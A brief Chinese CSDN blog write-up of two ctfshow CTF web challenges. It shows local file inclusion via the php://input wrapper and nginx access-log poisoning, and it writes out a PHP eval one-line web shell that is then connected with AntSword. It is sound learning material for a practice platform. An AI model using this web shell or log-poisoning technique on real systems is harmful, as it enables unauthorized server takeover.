ctfshow刷题笔记(web篇)

CTFshow web刷题笔记

感觉ctfshow的web比buu友好多了,buu前三题直接劝退

PHP

web3

在这里插入图片描述
题目提示是php伪协议,然后文件含有漏洞
我们在后边加一句?url=php://input发送post请求然后抓个包
在这里插入图片描述
放包后显示了文件
在这里插入图片描述
然后直接cat文件即可
在这里插入图片描述
得到flag
在这里插入图片描述

web4

在这里插入图片描述
看起来和web3一样,但是web3的方法做不了
先到默认目录看一下日志

?url=/var/log/nginx/access.log

在这里插入图片描述
抓个包进行一下注入

<?php @eval($_POST['123']);?>#密码123

在这里插入图片描述
然后用蚁剑连接
在这里插入图片描述
成功找到flag
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:1024 设计师:我叫白小胖 返回首页
评论

打赏作者

Gygert

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值